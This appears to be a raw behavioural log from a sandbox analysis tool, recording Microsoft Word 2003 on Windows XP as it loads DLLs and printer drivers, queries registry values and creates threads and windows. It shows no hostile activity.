    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL query and write and read and execute image 37320000 135168 own pid read write success or wait 1
    \KnownDlls\WINSPOOL.DRV write and read and execute unknown 37320000 135168 own pid read write object name not found 1
    C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
    \KnownDlls\OLEACC.dll write and read and execute unknown 73000000 155648 own pid read write object name not found 1
    C:\WINDOWS\system32\oleacc.dll query and write and read and execute image 74C80000 180224 own pid read write success or wait 1
    \KnownDlls\MSVCP60.dll write and read and execute unknown 74C80000 180224 own pid read write object name not found 1
    C:\WINDOWS\system32\msvcp60.dll query and write and read and execute image 76080000 413696 own pid read write success or wait 1
    C:\WINDOWS\system32\oleaccrc.dll query and read commit 1AD0000 20480 own pid readonly success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL query and read commit 1C70000 49152 own pid readonly success or wait 1
    C:\WINDOWS\system32\stdole2.tlb query and read commit 1C80000 16384 own pid readonly success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL write and read and execute commit 1C90000 20480 own pid execute success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL query and write and read and execute image 374B0000 24576 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL write and read and execute commit 1EA0000 86016 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL query and write and read and execute image 3F000000 86016 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSP3EN.LEX query and read commit 1EB0000 364544 own pid readonly success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL write and read and execute commit 1F10000 536576 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL query and write and read and execute image 507C0000 540672 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap33678 query and write and read reserve 2320000 4194304 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap3369A query and write and read reserve 2320000 4194304 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap336AD query and write and read reserve 2320000 4194304 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll write and read and execute commit 2B10000 745472 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll query and write and read and execute image 7E5A0000 761856 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2B10000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2B20000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2B20000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2B10000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2B20000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2B20000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2B10000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2B20000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2B20000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll write and read and execute commit 2B10000 765952 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll query and write and read and execute image 3F500000 786432 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2B20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2B30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2B30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2B20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2B30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2B30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\fontsub.dll write and read and execute commit 2F20000 81920 own pid execute success or wait 1
    C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\fontsub.dll write and read and execute commit 2F20000 81920 own pid execute success or wait 1
    C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 1D90000 200704 own pid execute success or wait 1
    C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 1D90000 200704 own pid readonly success or wait 1
    C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 1D90000 200704 own pid execute success or wait 1
    C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 1D90000 200704 own pid readonly success or wait 1
    C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 2B20000 1695744 own pid execute success or wait 1
    C:\Program Files\Messenger\msmsgs.exe query and read commit 2B20000 1695744 own pid readonly success or wait 1
    C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 2B20000 1695744 own pid execute success or wait 1
    C:\Program Files\Messenger\msmsgs.exe query and read commit 2B20000 1695744 own pid readonly success or wait 1
    \BaseNamedObjects\MSCTF.Shared.SFM.MAB query and write and read reserve 1D90000 524288 own pid read write success or wait 1
    + Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12218368 own pid execute success or wait 1 30003006
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12263424 own pid read write success or wait 1 30003006
    \BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1 30003006
    \BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown 9C0000 4096 own pid readonly success or wait 1 3036B023
    \BaseNamedObjects\PrimaryWord11CommandLine read unknown 9C0000 4096 own pid readonly object name not found 1 307940F8
    \BaseNamedObjects\PrimaryWord11CommandLine query and write and read commit 9C0000 4096 own pid read write success or wait 1 3079411A
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A40000 1056768 own pid execute success or wait 1 303703E2
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 303703E2
    \KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A40000 4096 own pid execute success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest query and read commit A40000 4096 own pid readonly success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest read commit A40000 4096 own pid readonly success or wait 1 303703E2
    \BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown 755C0000 188416 own pid read write success or wait 1 30029EE0
    \KnownDlls\MSIMG32.dll write and read and execute unknown 1AA0000 159744 own pid execute object name not found 1 30003591
    C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 30003591
    C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL write and read and execute commit 2320000 3346432 own pid execute success or wait 1 30199EB3
    C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL query and write and read and execute image 3F100000 3346432 own pid read write success or wait 1 30199EB3
    Registry Activities:
    + Key value queried
    Key Path Name Completion Count Source Address
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager CommonFilesDir success or wait 1 30002FEA
    HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Office\11.0\Word MTTT success or wait 2 3
    Thread Activities:
    + Thread created
    TID PID EIP Injected Filepath Completion Count Source Address
    1800 296 7C8106F9 false C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30070E79
    236 296 7C8106F9 false C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30070E79
    + Thread resumed
    TID PID Completion Count Source Address
    1800 296 success or wait 1 30070E9B
    236 296 success or wait 1 30070E9B
    Memory Activities:
    + Memory attributes changed
    PID Filepath Base Length New Protection Old Protection Completion Count Source Address
    296 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 30B4D000 1000 page readonly page read and write success or wait 1 30001C39
    User Activities:
    + Window created
    Window name Class name Completion Count Source Address
    OpusApp OpusApp success 1 3002919F
    _WwC _WwC success 1 300516EB
    _WwF _WwF success 1 300516EB
    _WwB _WwB success 1 3002919F
    _WwG _WwG success 1 3002919F
    6.0.2600.6028!ScrollBar SCROLLBAR success 1 300516EB
    _WwC _WwC success 1 300516EB
    6.0.2600.6028!ScrollBar SCROLLBAR success 1 300516EB
    _WwC _WwC success 1 300516EB
    _WwC _WwC success 1 300516EB
    _WwC _WwC success 1 300516EB
    + Window found
    Window name Class name HWND of window Completion Count Source Address
    no string MSOBALLOON 0 success 4 0
    no string MsoHelp10 0 success 3 0
    no string AgentAnim 0 success 4 0
    + Window enumerated
    Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
    0 4004A true 0 30050, 30052, 30054, 30064, 10066, 10068, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 1 C0CF
    0 0 false 594 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 4 45F
    + Message sent to window
    HWND Message LParam WParam Completion Count Source Address
    A00D0 45B 0 0 success 1 30794417
    10176 C141 0 0 success 16 300A3D6D
    10176 45F 0 0 success 1 30003AB6
    101B8 402 0 0 success 1 30299DBF
    2017C 402 0 0 success 12 30299DBF
    101B6 402 0 0 success 8 30299DBF
    10180 402 0 0 success 1 30299DBF
    + Window hook set
    Module Thread id Hook code Completion Count Source Address
    C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 268 FFFFFFFF success 1 3000783A
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 472355140
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 472358708
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 472360500
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 472361494
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 472362610
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 472363044
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 472363603
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 472363739
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 472376570
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 472378397
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 472381481
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 472387567
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 472389658
    Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 472397426
    Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 472400454
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 472417334
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 472420028
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 472420828
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 850000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 472471361
    Memory attributes changed PID: 296 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 30B4D000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 472482133
    Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: CommonFilesDir success or wait 472482382
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: write and read and execute Type: commit Baseaddress: 860000 Size: 12218368 Protection: execute Mapped to pid: own pid success or wait 472494565
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: query and write and read and execute Type: image Baseaddress: 30C90000 Size: 12263424 Protection: read write Mapped to pid: own pid success or wait 472499481
    Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 472535007
    Section loaded Path: \KnownDlls\psapi.dll Access: write and read and execute Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid object name not found 472558649
    Section loaded Path: C:\WINDOWS\system32\psapi.dll Access: query and write and read and execute Type: image Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid success or wait 472559320
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL Access: write and read and execute Type: commit Baseaddress: 8D0000 Size: 774144 Protection: execute Mapped to pid: own pid success or wait 472603393
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL Access: query and read Type: commit Baseaddress: 8D0000 Size: 774144 Protection: readonly Mapped to pid: own pid success or wait 472605059
    Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: 9C0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 472615117
    Section loaded Path: \BaseNamedObjects\PrimaryWord11CommandLine Access: read Type: unknown Baseaddress: 9C0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 472617212
    Section loaded Path: \BaseNamedObjects\PrimaryWord11CommandLine Access: query and write and read Type: commit Baseaddress: 9C0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 472617337
    Message posted HWND: A00D0 Message: 45B WParam: 0 LParam: 0 success 472617634
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19211106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: A20000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 490482960
    Section loaded Path: \KnownDlls\uxtheme.dll Access: write and read and execute Type: unknown Baseaddress: A20000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 490484978
    Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 490486741
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: A40000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 490536549
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 490539040
    Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 490544098
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: A40000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 490554135
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: A40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 490556936
